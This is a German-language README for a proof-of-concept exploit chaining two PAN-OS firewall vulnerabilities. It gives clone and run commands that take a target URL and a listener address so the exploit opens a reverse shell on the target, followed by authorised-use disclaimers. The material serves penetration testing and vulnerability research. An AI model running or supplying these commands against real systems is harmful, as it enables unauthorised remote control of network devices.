
Dieses PoC zielt auf Schwachstellen in Palo Alto PAN-OS ab, insbesondere CVE-2024-0012 und CVE-2024-9474. Dieses Skript automatisiert den Ausnutzungsprozess, einschließlich Payload-Erstellung, Chunked-Auslieferung und nahtloser Befehlsausführung.
Dieses Proof-of-Concept (PoC)-Skript zielt auf Schwachstellen in Palo Alto PAN-OS ab, speziell CVE-2024-0012 und CVE-2024-9474, indem es den Ausnutzungsprozess automatisiert, einschließlich Authentifizierungsumgehung, Payload-Erstellung, Chunked-Delivery und nahtloser Befehlsausführung.
⚠️ Dieses Skript dient ausschließlich zu Bildungs- und autorisierten Penetrationstest-Zwecken. Unautorisierte Nutzung ist illegal.
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
<TARGET_URL>: Die Ziel-URL, inklusive http oder https.<LISTENER_IP>: Ihre IP-Adresse für den Reverse-Shell-Listener.<LISTENER_PORT>: Der Port für den Reverse-Shell-Listener.python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
Erhalten Sie die vollständige Aufschlüsselung und technische Einblicke in dieses PoC aus diesem Medium-Artikel!
Dieses PoC ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt. Die unbefugte Nutzung dieses Tools ist strengstens untersagt. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.